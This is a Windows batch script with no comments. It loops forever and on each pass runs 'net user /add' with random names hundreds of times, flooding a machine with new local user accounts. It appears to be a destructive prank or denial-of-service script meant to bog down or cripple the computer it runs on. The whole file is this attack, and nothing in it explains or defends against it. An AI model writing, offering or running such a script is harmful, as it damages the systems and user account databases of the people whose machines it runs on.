@echo off

:go
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
net user /add %random%%random%%random%
goto go